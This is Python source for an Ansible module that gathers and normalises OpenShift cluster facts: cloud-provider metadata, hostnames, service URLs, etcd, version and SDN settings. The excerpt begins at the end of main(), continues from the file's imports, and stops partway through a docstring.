    # disabling pylint errors for global-variable-undefined and invalid-name
    # for 'global module' usage, since it is required to use ansible_facts
    # pylint: disable=global-variable-undefined, invalid-name
    global module
    module = AnsibleModule(  # noqa: F405
        argument_spec=dict(
            role=dict(default='common', required=False,
                      choices=OpenShiftFacts.known_roles),
            local_facts=dict(default=None, type='dict', required=False),
            additive_facts_to_overwrite=dict(default=[], type='list', required=False),
            openshift_env=dict(default={}, type='dict', required=False),
            openshift_env_structures=dict(default=[], type='list', required=False),
            protected_facts_to_overwrite=dict(default=[], type='list', required=False)
        ),
        supports_check_mode=True,
        add_file_common_args=True,
    )

    if not HAVE_DBUS:
        module.fail_json(msg="This module requires dbus python bindings")  # noqa: F405

    # Parameters consumed by the ansible_facts() gathering call in __init__.
    module.params['gather_subset'] = ['hardware', 'network', 'virtual', 'facter']  # noqa: F405
    module.params['gather_timeout'] = 10  # noqa: F405
    module.params['filter'] = '*'  # noqa: F405

    role = module.params['role']  # noqa: F405
    local_facts = module.params['local_facts']  # noqa: F405
    additive_facts_to_overwrite = module.params['additive_facts_to_overwrite']  # noqa: F405
    openshift_env = module.params['openshift_env']  # noqa: F405
    openshift_env_structures = module.params['openshift_env_structures']  # noqa: F405
    protected_facts_to_overwrite = module.params['protected_facts_to_overwrite']  # noqa: F405

    fact_file = '/etc/ansible/facts.d/openshift.fact'

    openshift_facts = OpenShiftFacts(role,
                                     fact_file,
                                     local_facts,
                                     additive_facts_to_overwrite,
                                     openshift_env,
                                     openshift_env_structures,
                                     protected_facts_to_overwrite)

    # Apply requested ownership/mode changes to the fact file; report
    # changed if either the file attributes or the facts changed.
    file_params = module.params.copy()  # noqa: F405
    file_params['path'] = fact_file
    file_args = module.load_file_common_arguments(file_params)  # noqa: F405
    changed = module.set_fs_attributes_if_different(file_args,  # noqa: F405
                                                    openshift_facts.changed)

    return module.exit_json(changed=changed,  # noqa: F405
                            ansible_facts=openshift_facts.facts)


if __name__ == '__main__':
    main()
| 41.357999 | 129 | 0.57671 |
# Status: Permanently disabled to keep this module as self-contained as possible.
# pylint: disable=no-name-in-module, import-error, wrong-import-order
import copy
import errno
import json
import re
import io
import os
import yaml
import struct
import socket
from distutils.util import strtobool
from distutils.version import LooseVersion
from ansible.module_utils.six import string_types, text_type
from ansible.module_utils.six.moves import configparser
# ignore pylint errors related to the module_utils import
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import
# import module snippets
from ansible.module_utils.basic import * # noqa: F403
from ansible.module_utils.facts import * # noqa: F403
from ansible.module_utils.urls import * # noqa: F403
from ansible.module_utils.six import iteritems, itervalues
from ansible.module_utils.six.moves.urllib.parse import urlparse, urlunparse
from ansible.module_utils._text import to_native
HAVE_DBUS = False
try:
from dbus import SystemBus, Interface
from dbus.exceptions import DBusException
HAVE_DBUS = True
except ImportError:
pass
# Standard Ansible module documentation/examples blocks (parsed by ansible-doc).
DOCUMENTATION = '''
---
module: openshift_facts
short_description: Cluster Facts
author: Jason DeTiberus
requirements: [ ]
'''
EXAMPLES = '''
'''
def migrate_docker_facts(facts):
    """ Move legacy docker_* facts from other roles under the 'docker' role.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict with docker facts relocated
    """
    moves = {
        'common': ('additional_registries', 'insecure_registries',
                   'blocked_registries', 'options'),
        'node': ('log_driver', 'log_options'),
    }
    docker = facts.setdefault('docker', {})
    for role, names in moves.items():
        if role not in facts:
            continue
        for name in names:
            legacy = 'docker_' + name
            if legacy in facts[role]:
                docker[name] = facts[role].pop(legacy)

    # The node portal_net fact now describes the hosted registry network.
    if 'portal_net' in facts.get('node', {}):
        docker['hosted_registry_network'] = facts['node'].pop('portal_net')

    # log_options was originally meant to be a comma separated string, but
    # we now prefer an actual list, with backward compatibility:
    if 'log_options' in docker and \
            isinstance(docker['log_options'], string_types):
        docker['log_options'] = docker['log_options'].split(",")

    return facts
# TODO: We should add a generic migration function that takes source and destination
# paths and does the right thing rather than one function for common, one for node, etc.
def migrate_common_facts(facts):
    """ Migrate facts from various roles to common.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict with role facts moved under 'common'
    """
    # NOTE: these values must be tuples.  The previous bare parenthesized
    # strings ('portal_net') were iterated character-by-character, so the
    # migration silently never matched any real fact name.
    params = {
        'node': ('portal_net',),
        'master': ('portal_net',)
    }
    if 'common' not in facts:
        facts['common'] = {}
    # pylint: disable=consider-iterating-dictionary
    for role in params.keys():
        if role in facts:
            for param in params[role]:
                if param in facts[role]:
                    facts['common'][param] = facts[role].pop(param)
    return facts
def migrate_node_facts(facts):
    """ Migrate facts from various roles to node.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict with role facts moved under 'node'
    """
    # NOTE: the value must be a tuple.  The previous bare parenthesized
    # string ('dns_ip') was iterated character-by-character, so the
    # migration silently never matched the fact.
    params = {
        'common': ('dns_ip',),
    }
    if 'node' not in facts:
        facts['node'] = {}
    # pylint: disable=consider-iterating-dictionary
    for role in params.keys():
        if role in facts:
            for param in params[role]:
                if param in facts[role]:
                    facts['node'][param] = facts[role].pop(param)
    return facts
def migrate_hosted_facts(facts):
    """ Move master router/registry selector facts under hosted.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict with selectors under hosted.router/registry
    """
    if 'master' not in facts:
        return facts
    for legacy_key, component in (('router_selector', 'router'),
                                  ('registry_selector', 'registry')):
        if legacy_key in facts['master']:
            # Scaffold hosted.<component> lazily, then relocate the selector.
            hosted = facts.setdefault('hosted', {})
            hosted.setdefault(component, {})['selector'] = facts['master'].pop(legacy_key)
    return facts
def migrate_admission_plugin_facts(facts):
    """ Fold legacy kube_admission_plugin_config into admission_plugin_config.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict with a single admission_plugin_config fact
    """
    master = facts.get('master', {})
    if 'kube_admission_plugin_config' in master:
        existing = master.setdefault('admission_plugin_config', dict())
        # Merge existing kube_admission_plugin_config with admission_plugin_config.
        master['admission_plugin_config'] = merge_facts(existing,
                                                        master['kube_admission_plugin_config'],
                                                        additive_facts_to_overwrite=[],
                                                        protected_facts_to_overwrite=[])
        # Remove kube_admission_plugin_config fact
        master.pop('kube_admission_plugin_config', None)
    return facts
def migrate_local_facts(facts):
    """ Run all fact migrations against a copy of the local facts.

        Args:
            facts (dict): existing local facts
        Returns:
            dict: a migrated deep copy of the provided facts
    """
    migrations = (migrate_docker_facts,
                  migrate_common_facts,
                  migrate_node_facts,
                  migrate_hosted_facts,
                  migrate_admission_plugin_facts)
    # Work on a deep copy so the caller's dict is left untouched.
    migrated = copy.deepcopy(facts)
    for migration in migrations:
        migrated = migration(migrated)
    return migrated
def first_ip(network):
    """ Return the first host address in a CIDR network.

        Args:
            network (str): network in prefix-length form, e.g. '172.30.0.0/16'
        Returns:
            str: the address following the network address, e.g. '172.30.0.1'
    """
    address, prefix = network.split('/')
    # Parse the prefix length directly as an integer; the previous code
    # round-tripped it through socket.inet_aton, which only accepted it
    # because inet_aton treats a bare number as a 32-bit address.
    mask = (0xffffffff << (32 - int(prefix))) & 0xffffffff
    addr_i = struct.unpack('!I', socket.inet_aton(address))[0]
    return socket.inet_ntoa(struct.pack('!I', (addr_i & mask) + 1))
def hostname_valid(hostname):
    """ Test if the provided hostname should be considered valid

        Args:
            hostname (str): hostname to test
        Returns:
            bool: True if the hostname is valid for an OpenShift node
    """
    if not hostname:
        return False
    # OpenShift will not allow a node with more than 63 chars in name.
    if len(hostname) > 63:
        return False
    return not (hostname.startswith('localhost') or
                hostname.endswith('localdomain'))
def choose_hostname(hostnames=None, fallback=''):
    """ Choose the best hostname from a list of candidates.

        Non-IP names are preferred over IP addresses; the fallback is
        returned when no candidate passes hostname_valid().

        Args:
            hostnames (list): candidate hostnames / IP addresses
            fallback (str): value to return when nothing suitable is found
        Returns:
            str: the chosen hostname
    """
    if hostnames is None:
        return fallback

    ip_regex = r'\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z'
    ips = [candidate for candidate in hostnames
           if candidate is not None and isinstance(candidate, string_types) and
           re.match(ip_regex, candidate)]
    names = [candidate for candidate in hostnames
             if candidate is not None and candidate != '' and candidate not in ips]

    # Prefer real names first, then fall back to IP addresses.
    for candidate in names + ips:
        if hostname_valid(candidate):
            return candidate

    return fallback
def query_metadata(metadata_url, headers=None, expect_json=False):
    """ Fetch a single metadata URL.

        Args:
            metadata_url (str): URL to query
            headers (dict): optional request headers
            expect_json (bool): parse the response body as JSON when True
        Returns:
            dict or list: parsed JSON, or the response's stripped text lines
        Raises:
            OpenShiftFactsMetadataUnavailableError: on any non-200 response
    """
    response, info = fetch_url(module, metadata_url, headers=headers)  # noqa: F405
    if info['status'] != 200:
        raise OpenShiftFactsMetadataUnavailableError("Metadata unavailable")
    if expect_json:
        return module.from_json(to_native(response.read()))  # noqa: F405
    return [to_native(line.strip()) for line in response.readlines()]
def walk_metadata(metadata_url, headers=None, expect_json=False):
    """ Recursively walk a line-oriented metadata tree into a dict.

        Entries ending in '/' (except 'public-keys/') are treated as
        sub-trees and walked recursively; everything else is fetched as a
        leaf value.
    """
    tree = dict()
    for entry in query_metadata(metadata_url, headers, expect_json):
        if entry.endswith('/') and entry != 'public-keys/':
            tree[entry[:-1]] = walk_metadata(metadata_url + entry,
                                             headers, expect_json)
            continue
        leaf = query_metadata(metadata_url + entry, headers, expect_json)
        # disable pylint maybe-no-member because overloaded use of
        # the module name causes pylint to not detect that results
        # is an array or hash
        # pylint: disable=maybe-no-member
        # A single-element response is stored as a scalar, otherwise as a list.
        tree[entry] = leaf.pop() if len(leaf) == 1 else leaf
    return tree
def get_provider_metadata(metadata_url, supports_recursive=False,
                          headers=None, expect_json=False):
    """ Fetch provider metadata, returning None when it is unavailable.

        Args:
            metadata_url (str): base metadata URL
            supports_recursive (bool): endpoint can return the whole tree in
                a single query (e.g. GCE's ?recursive=true)
            headers (dict): optional request headers
            expect_json (bool): parse responses as JSON
        Returns:
            dict or list or None: the metadata, or None if unreachable
    """
    try:
        if supports_recursive:
            # One query returns the entire tree.
            return query_metadata(metadata_url, headers, expect_json)
        # Otherwise crawl the tree one path at a time.
        return walk_metadata(metadata_url, headers, expect_json)
    except OpenShiftFactsMetadataUnavailableError:
        return None
def normalize_gce_facts(metadata, facts):
    """ Normalize GCE instance metadata into provider network facts.

        Args:
            metadata (dict): GCE metadata (instance networkInterfaces/zone/hostname)
            facts (dict): facts to update; must contain facts['network']['interfaces']
        Returns:
            dict: the updated facts
    """
    for interface in metadata['instance']['networkInterfaces']:
        public_ips = [config['externalIp'] for config in interface['accessConfigs']]
        public_ips.extend(interface['forwardedIps'])
        facts['network']['interfaces'].append(dict(
            ips=[interface['ip']],
            network_type='gce',
            public_ips=public_ips,
            # Keep only the trailing network name from the full resource path.
            network_id=interface['network'].rpartition('/')[2],
        ))

    facts['zone'] = metadata['instance']['zone'].rpartition('/')[2]

    # GCE currently only supports a single interface
    primary = facts['network']['interfaces'][0]
    facts['network']['ip'] = primary['ips'][0]
    facts['network']['public_ip'] = primary['public_ips'][0]
    # Split instance hostname from GCE metadata to use the short instance name
    facts['network']['hostname'] = metadata['instance']['hostname'].split('.')[0]

    # TODO: attempt to resolve public_hostname
    facts['network']['public_hostname'] = facts['network']['public_ip']

    return facts
def normalize_aws_facts(metadata, facts):
    """ Normalize AWS instance metadata into provider network facts.

        Args:
            metadata (dict): AWS metadata (network/interfaces/macs, placement, ...)
            facts (dict): facts to update; must contain facts['network']['interfaces']
        Returns:
            dict: the updated facts
    """
    interfaces = metadata['network']['interfaces']['macs'].values()
    for interface in sorted(interfaces, key=lambda x: x['device-number']):
        int_info = dict()
        for fact_name, meta_name in (('ips', 'local-ipv4s'),
                                     ('public_ips', 'public-ipv4s')):
            addresses = interface.get(meta_name)
            # The metadata reports a bare string for a single address.
            if isinstance(addresses, string_types):
                int_info[fact_name] = [addresses]
            else:
                int_info[fact_name] = addresses
        if 'vpc-id' in interface:
            int_info['network_type'] = 'vpc'
            int_info['network_id'] = interface['subnet-id']
        else:
            int_info['network_type'] = 'classic'
            int_info['network_id'] = None
        facts['network']['interfaces'].append(int_info)

    facts['zone'] = metadata['placement']['availability-zone']

    # TODO: actually attempt to determine default local and public ips
    # by using the ansible default ip fact and the ipv4-associations
    # from the ec2 metadata
    facts['network']['ip'] = metadata.get('local-ipv4')
    facts['network']['public_ip'] = metadata.get('public-ipv4')

    # TODO: verify that local hostname makes sense and is resolvable
    facts['network']['hostname'] = metadata.get('local-hostname')

    # TODO: verify that public hostname makes sense and is resolvable
    facts['network']['public_hostname'] = metadata.get('public-hostname')

    return facts
def normalize_openstack_facts(metadata, facts):
    """ Normalize OpenStack instance metadata into provider facts.

        Args:
            metadata (dict): raw OpenStack metadata (with ec2_compat section)
            facts (dict): facts to update in place
        Returns:
            dict: the updated facts
    """
    # openstack ec2 compat api does not support network interfaces and
    # the version tested on did not include the info in the openstack
    # metadata api, should be updated if neutron exposes this.
    facts['zone'] = metadata['availability_zone']
    facts['network']['ip'] = metadata['ec2_compat']['local-ipv4'].split(',')[0]
    facts['network']['public_ip'] = metadata['ec2_compat']['public-ipv4']
    hostname_map = [('hostname', 'hostname', 'local-ipv4'),
                    ('public_hostname', 'public-hostname', 'public-ipv4')]
    for fact_key, host_key, ip_key in hostname_map:
        try:
            # Only trust a metadata hostname when it resolves back to the
            # matching metadata IP; otherwise fall back to the IP itself.
            resolved_ip = socket.gethostbyname(metadata['ec2_compat'][host_key])
            if resolved_ip == metadata['ec2_compat'][ip_key]:
                facts['network'][fact_key] = metadata['ec2_compat'][host_key]
            else:
                facts['network'][fact_key] = metadata['ec2_compat'][ip_key]
        except socket.gaierror:
            facts['network'][fact_key] = metadata['ec2_compat'][ip_key]
    return facts
def normalize_provider_facts(provider, metadata):
    """ Normalize provider facts for a known cloud provider.

        Args:
            provider (str): host provider ('gce', 'aws', 'openstack' or other)
            metadata (dict): provider metadata
        Returns:
            dict: the normalized provider facts ({} when provider or
                  metadata is missing)
    """
    if provider is None or metadata is None:
        return {}
    # TODO: test for ipv6_enabled where possible (gce, aws do not support)
    # and configure ipv6 facts if available
    # TODO: add support for setting user_data if available
    facts = dict(name=provider, metadata=metadata,
                 network=dict(interfaces=[], ipv6_enabled=False))
    if provider == 'gce':
        return normalize_gce_facts(metadata, facts)
    if provider == 'aws':
        return normalize_aws_facts(metadata, facts)
    if provider == 'openstack':
        return normalize_openstack_facts(metadata, facts)
    return facts
def set_node_schedulability(facts):
    """ Set the node schedulable fact if not already present.

        Nodes colocated with a master default to unschedulable; standalone
        nodes default to schedulable.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with node.schedulable
    """
    if 'node' in facts and 'schedulable' not in facts['node']:
        facts['node']['schedulable'] = 'master' not in facts
    return facts
def set_selectors(facts):
    """ Set the default node selectors for the hosted components (router,
        registry, metrics, etcd) and for logging when they are unset or
        set to the literal string 'None'.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with the default selectors
    """
    infra_selector = "region=infra"
    hosted = facts.setdefault('hosted', {})
    # Router and registry land on infra nodes by default; metrics and etcd
    # default to no selector at all.
    for component, default_selector in (('router', infra_selector),
                                        ('registry', infra_selector),
                                        ('metrics', None),
                                        ('etcd', None)):
        component_facts = hosted.setdefault(component, {})
        # A missing selector and the string 'None' both count as unset.
        if component_facts.get('selector') in [None, 'None']:
            component_facts['selector'] = default_selector
    logging_facts = facts.setdefault('logging', {})
    if logging_facts.get('selector') in [None, 'None']:
        logging_facts['selector'] = None
    return facts
def set_dnsmasq_facts_if_unset(facts):
    """ Set the master dns_port fact if unset.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict with master.dns_port defaulted to 8053
    """
    if 'common' in facts and 'master' in facts:
        # 8053 is the master's alternate DNS port (presumably frees port 53
        # for dnsmasq — confirm against the dnsmasq role).
        facts['master'].setdefault('dns_port', 8053)
    return facts
def set_project_cfg_facts_if_unset(facts):
    """ Set the master project configuration facts if not already present.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with the project config defaults
    """
    if 'master' in facts:
        master = facts['master']
        defaults = (('default_node_selector', ''),
                    ('project_request_message', ''),
                    ('project_request_template', ''),
                    ('mcs_allocator_range', 's0:/2'),
                    ('mcs_labels_per_project', 5),
                    ('uid_allocator_range', '1000000000-1999999999/10000'))
        for key, default_value in defaults:
            master.setdefault(key, default_value)
    return facts
def set_identity_providers_if_unset(facts):
    """ Set the default identity provider if unset.

        Origin deployments default to allowing any username/password;
        enterprise deployments default to denying all password logins.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with the default identity provider
    """
    if 'master' in facts:
        deployment_type = facts['common']['deployment_type']
        if 'identity_providers' not in facts['master']:
            if deployment_type == 'openshift-enterprise':
                provider_name, provider_kind = 'deny_all', 'DenyAllPasswordIdentityProvider'
            else:
                provider_name, provider_kind = 'allow_all', 'AllowAllPasswordIdentityProvider'
            facts['master']['identity_providers'] = [dict(name=provider_name,
                                                          challenge=True,
                                                          login=True,
                                                          kind=provider_kind)]
    return facts
def set_url_facts_if_unset(facts):
    """ Set url facts if not already present in facts dict

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with the generated url facts if they
                  were not already present
    """
    if 'master' in facts:
        hostname = facts['common']['hostname']
        cluster_hostname = facts['master'].get('cluster_hostname')
        cluster_public_hostname = facts['master'].get('cluster_public_hostname')
        public_hostname = facts['common']['public_hostname']
        # Prefer the load-balanced cluster hostnames when configured.
        api_hostname = cluster_hostname if cluster_hostname else hostname
        api_public_hostname = cluster_public_hostname if cluster_public_hostname else public_hostname
        console_path = facts['master']['console_path']
        etcd_hosts = facts['master']['etcd_hosts']
        # Scheme and port per endpoint kind.
        use_ssl = dict(
            api=facts['master']['api_use_ssl'],
            public_api=facts['master']['api_use_ssl'],
            loopback_api=facts['master']['api_use_ssl'],
            console=facts['master']['console_use_ssl'],
            public_console=facts['master']['console_use_ssl'],
            etcd=facts['master']['etcd_use_ssl']
        )
        ports = dict(
            api=facts['master']['api_port'],
            public_api=facts['master']['api_port'],
            loopback_api=facts['master']['api_port'],
            console=facts['master']['console_port'],
            public_console=facts['master']['console_port'],
            etcd=facts['master']['etcd_port'],
        )
        etcd_urls = []
        if etcd_hosts != '':
            # External etcd cluster: one URL per configured host.
            facts['master']['etcd_port'] = ports['etcd']
            facts['master']['embedded_etcd'] = False
            for host in etcd_hosts:
                etcd_urls.append(format_url(use_ssl['etcd'], host,
                                            ports['etcd']))
        else:
            # Embedded etcd: a single URL pointing at this master.
            etcd_urls = [format_url(use_ssl['etcd'], hostname,
                                    ports['etcd'])]
        facts['master'].setdefault('etcd_urls', etcd_urls)
        prefix_hosts = [('api', api_hostname),
                        ('public_api', api_public_hostname),
                        ('loopback_api', hostname)]
        for prefix, host in prefix_hosts:
            facts['master'].setdefault(prefix + '_url', format_url(use_ssl[prefix],
                                                                   host,
                                                                   ports[prefix]))
        # Loopback kubeconfig identifiers; dots are replaced with dashes so
        # the names are usable as kubeconfig cluster/context names.
        r_lhn = "{0}:{1}".format(hostname, ports['api']).replace('.', '-')
        r_lhu = "system:openshift-master/{0}:{1}".format(api_hostname, ports['api']).replace('.', '-')
        facts['master'].setdefault('loopback_cluster_name', r_lhn)
        facts['master'].setdefault('loopback_context_name', "default/{0}/system:openshift-master".format(r_lhn))
        facts['master'].setdefault('loopback_user', r_lhu)
        prefix_hosts = [('console', api_hostname), ('public_console', api_public_hostname)]
        for prefix, host in prefix_hosts:
            facts['master'].setdefault(prefix + '_url', format_url(use_ssl[prefix],
                                                                   host,
                                                                   ports[prefix],
                                                                   console_path))
    return facts
def set_aggregate_facts(facts):
    """ Set aggregate facts (the hostname/IP collections the cluster
        certificates and no-proxy logic must recognize).

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with aggregated facts
    """
    all_hostnames = set()
    internal_hostnames = set()
    if 'common' in facts:
        # Bugfix: first_ip() and the final facts['common'][...] writes were
        # previously executed outside this guard, raising KeyError for fact
        # dicts without a 'common' section and making the guard useless.
        kube_svc_ip = first_ip(facts['common']['portal_net'])
        all_hostnames.add(facts['common']['hostname'])
        all_hostnames.add(facts['common']['public_hostname'])
        all_hostnames.add(facts['common']['ip'])
        all_hostnames.add(facts['common']['public_ip'])
        facts['common']['kube_svc_ip'] = kube_svc_ip
        internal_hostnames.add(facts['common']['hostname'])
        internal_hostnames.add(facts['common']['ip'])
        cluster_domain = facts['common']['dns_domain']
        if 'master' in facts:
            if 'cluster_hostname' in facts['master']:
                all_hostnames.add(facts['master']['cluster_hostname'])
            if 'cluster_public_hostname' in facts['master']:
                all_hostnames.add(facts['master']['cluster_public_hostname'])
            # Well-known service names the API must answer to.
            svc_names = ['openshift', 'openshift.default', 'openshift.default.svc',
                         'openshift.default.svc.' + cluster_domain, 'kubernetes', 'kubernetes.default',
                         'kubernetes.default.svc', 'kubernetes.default.svc.' + cluster_domain]
            all_hostnames.update(svc_names)
            internal_hostnames.update(svc_names)
            all_hostnames.add(kube_svc_ip)
            internal_hostnames.add(kube_svc_ip)
        facts['common']['all_hostnames'] = list(all_hostnames)
        facts['common']['internal_hostnames'] = list(internal_hostnames)
    return facts
def set_etcd_facts_if_unset(facts):
    """ Set etcd facts if not already present.

        For embedded etcd the data dir is read from master-config.yaml; for
        standalone etcd it is read from ETCD_DATA_DIR in /etc/etcd/etcd.conf.
        Any parse error leaves the fact unset (deliberate best-effort).

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict, possibly updated with etcd.etcd_data_dir
    """
    if 'master' in facts and safe_get_bool(facts['master']['embedded_etcd']):
        etcd_facts = facts['etcd'] if 'etcd' in facts else dict()
        if 'etcd_data_dir' not in etcd_facts:
            try:
                # Parse master config to find actual etcd data dir:
                master_cfg_path = os.path.join(facts['common']['config_base'],
                                               'master/master-config.yaml')
                master_cfg_f = open(master_cfg_path, 'r')
                config = yaml.safe_load(master_cfg_f.read())
                master_cfg_f.close()
                etcd_facts['etcd_data_dir'] = \
                    config['etcdConfig']['storageDirectory']
                facts['etcd'] = etcd_facts
            # We don't want exceptions bubbling up here:
            except Exception:
                pass
    else:
        etcd_facts = facts['etcd'] if 'etcd' in facts else dict()
        try:
            # Add a [root] section header so the sysconfig-style etcd.conf
            # can be parsed with configparser.
            ini_str = text_type('[root]\n' + open('/etc/etcd/etcd.conf', 'r').read(), 'utf-8')
            ini_fp = io.StringIO(ini_str)
            config = configparser.RawConfigParser()
            config.readfp(ini_fp)
            etcd_data_dir = config.get('root', 'ETCD_DATA_DIR')
            # Strip surrounding double quotes if present:
            if etcd_data_dir.startswith('"') and etcd_data_dir.endswith('"'):
                etcd_data_dir = etcd_data_dir[1:-1]
            etcd_facts['etcd_data_dir'] = etcd_data_dir
            facts['etcd'] = etcd_facts
        # pylint: disable=broad-except
        except Exception:
            pass
    return facts
def set_deployment_facts_if_unset(facts):
    """ Set facts whose defaults depend on the deployment type, when unset.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with deployment-type-derived defaults
    """
    # disabled to avoid breaking up facts related to deployment type into
    # multiple methods for now.
    # pylint: disable=too-many-statements, too-many-branches
    if 'common' in facts:
        deployment_type = facts['common']['deployment_type']
        if 'service_type' not in facts['common']:
            # systemd service name prefix: 'origin' vs 'atomic-openshift'
            service_type = 'atomic-openshift'
            if deployment_type == 'origin':
                service_type = 'origin'
            facts['common']['service_type'] = service_type
    if 'docker' in facts:
        deployment_type = facts['common']['deployment_type']
        if deployment_type == 'openshift-enterprise':
            # Enterprise deployments pull from the Red Hat registry; ensure
            # it is present in additional_registries.
            addtl_regs = facts['docker'].get('additional_registries', [])
            ent_reg = 'registry.access.redhat.com'
            if ent_reg not in addtl_regs:
                facts['docker']['additional_registries'] = addtl_regs + [ent_reg]
    for role in ('master', 'node'):
        if role in facts:
            deployment_type = facts['common']['deployment_type']
            if 'registry_url' not in facts[role]:
                # Image name template; ${component} and ${version} are
                # substituted later when images are pulled.
                registry_url = 'openshift/origin-${component}:${version}'
                if deployment_type == 'openshift-enterprise':
                    registry_url = 'openshift3/ose-${component}:${version}'
                facts[role]['registry_url'] = registry_url
    if 'master' in facts:
        deployment_type = facts['common']['deployment_type']
        openshift_features = ['Builder', 'S2IBuilder', 'WebConsole']
        if 'disabled_features' not in facts['master']:
            if facts['common']['deployment_subtype'] == 'registry':
                # A standalone registry deployment disables builds and the
                # web console.
                facts['master']['disabled_features'] = openshift_features
    if 'node' in facts:
        deployment_type = facts['common']['deployment_type']
        if 'storage_plugin_deps' not in facts['node']:
            facts['node']['storage_plugin_deps'] = ['ceph', 'glusterfs', 'iscsi']
    return facts
# pylint: disable=too-many-statements
def set_version_facts_if_unset(facts):
    """ Set version facts (version string, short_version and the
        version_gte_* comparison booleans) if not already present.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with version facts
    """
    if 'common' in facts:
        deployment_type = facts['common']['deployment_type']
        openshift_version = get_openshift_version(facts)
        if openshift_version and openshift_version != "latest":
            version = LooseVersion(openshift_version)
            facts['common']['version'] = openshift_version
            facts['common']['short_version'] = '.'.join([str(x) for x in version.version[0:2]])
            if deployment_type == 'origin':
                # origin releases (1.x) pair with enterprise releases (3.x);
                # each *_or_* fact covers both numbering schemes.
                version_gte_3_1_or_1_1 = version >= LooseVersion('1.1.0')
                version_gte_3_1_1_or_1_1_1 = version >= LooseVersion('1.1.1')
                version_gte_3_2_or_1_2 = version >= LooseVersion('1.2.0')
                version_gte_3_3_or_1_3 = version >= LooseVersion('1.3.0')
                version_gte_3_4_or_1_4 = version >= LooseVersion('1.4')
                version_gte_3_5_or_1_5 = version >= LooseVersion('1.5')
                version_gte_3_6 = version >= LooseVersion('3.6')
                version_gte_3_7 = version >= LooseVersion('3.7')
            else:
                version_gte_3_1_or_1_1 = version >= LooseVersion('3.0.2.905')
                version_gte_3_1_1_or_1_1_1 = version >= LooseVersion('3.1.1')
                version_gte_3_2_or_1_2 = version >= LooseVersion('3.1.1.901')
                version_gte_3_3_or_1_3 = version >= LooseVersion('3.3.0')
                version_gte_3_4_or_1_4 = version >= LooseVersion('3.4')
                version_gte_3_5_or_1_5 = version >= LooseVersion('3.5')
                version_gte_3_6 = version >= LooseVersion('3.6')
                version_gte_3_7 = version >= LooseVersion('3.7')
        else:
            # 'Latest' version is set to True, 'Next' versions set to False
            version_gte_3_1_or_1_1 = True
            version_gte_3_1_1_or_1_1_1 = True
            version_gte_3_2_or_1_2 = True
            version_gte_3_3_or_1_3 = True
            version_gte_3_4_or_1_4 = True
            version_gte_3_5_or_1_5 = True
            version_gte_3_6 = True
            version_gte_3_7 = False
        facts['common']['version_gte_3_1_or_1_1'] = version_gte_3_1_or_1_1
        facts['common']['version_gte_3_1_1_or_1_1_1'] = version_gte_3_1_1_or_1_1_1
        facts['common']['version_gte_3_2_or_1_2'] = version_gte_3_2_or_1_2
        facts['common']['version_gte_3_3_or_1_3'] = version_gte_3_3_or_1_3
        facts['common']['version_gte_3_4_or_1_4'] = version_gte_3_4_or_1_4
        facts['common']['version_gte_3_5_or_1_5'] = version_gte_3_5_or_1_5
        facts['common']['version_gte_3_6'] = version_gte_3_6
        facts['common']['version_gte_3_7'] = version_gte_3_7
        # Map the installed version to the matching examples content dir.
        if version_gte_3_7:
            examples_content_version = 'v3.7'
        elif version_gte_3_6:
            examples_content_version = 'v3.6'
        elif version_gte_3_5_or_1_5:
            examples_content_version = 'v1.5'
        elif version_gte_3_4_or_1_4:
            examples_content_version = 'v1.4'
        elif version_gte_3_3_or_1_3:
            examples_content_version = 'v1.3'
        elif version_gte_3_2_or_1_2:
            examples_content_version = 'v1.2'
        elif version_gte_3_1_or_1_1:
            examples_content_version = 'v1.1'
        else:
            examples_content_version = 'v1.0'
        facts['common']['examples_content_version'] = examples_content_version
    return facts
def set_sdn_facts_if_unset(facts, system_facts):
    """ Set sdn facts if not already present in facts dict

        Args:
            facts (dict): existing facts
            system_facts (dict): ansible system facts, used to find the MTU
                of the interface carrying the node IP
        Returns:
            dict: the facts dict updated with the generated sdn facts
    """
    if 'master' in facts:
        # set defaults for sdn_cluster_network_cidr and sdn_host_subnet_length
        # these might be overridden if they exist in the master config file
        sdn_cluster_network_cidr = '10.128.0.0/14'
        sdn_host_subnet_length = '9'
        master_cfg_path = os.path.join(facts['common']['config_base'],
                                       'master/master-config.yaml')
        if os.path.isfile(master_cfg_path):
            with open(master_cfg_path, 'r') as master_cfg_f:
                config = yaml.safe_load(master_cfg_f.read())
                # Prefer values already present in the master config.
                if 'networkConfig' in config:
                    if 'clusterNetworkCIDR' in config['networkConfig']:
                        sdn_cluster_network_cidr = \
                            config['networkConfig']['clusterNetworkCIDR']
                    if 'hostSubnetLength' in config['networkConfig']:
                        sdn_host_subnet_length = \
                            config['networkConfig']['hostSubnetLength']
        if 'sdn_cluster_network_cidr' not in facts['master']:
            facts['master']['sdn_cluster_network_cidr'] = sdn_cluster_network_cidr
        if 'sdn_host_subnet_length' not in facts['master']:
            facts['master']['sdn_host_subnet_length'] = sdn_host_subnet_length
    if 'node' in facts and 'sdn_mtu' not in facts['node']:
        node_ip = facts['common']['ip']
        # default MTU if interface MTU cannot be detected
        facts['node']['sdn_mtu'] = '1450'
        for val in itervalues(system_facts):
            if isinstance(val, dict) and 'mtu' in val:
                mtu = val['mtu']
                if 'ipv4' in val and val['ipv4'].get('address') == node_ip:
                    # Leave 50 bytes of headroom for the SDN encapsulation.
                    facts['node']['sdn_mtu'] = str(mtu - 50)
    return facts
def set_nodename(facts):
    """ Set the node.nodename fact.

        On GCE the short instance name from the provider metadata is used;
        otherwise the lowercased common hostname. (An openstack-specific
        nodename was previously here but was considered too opinionated and
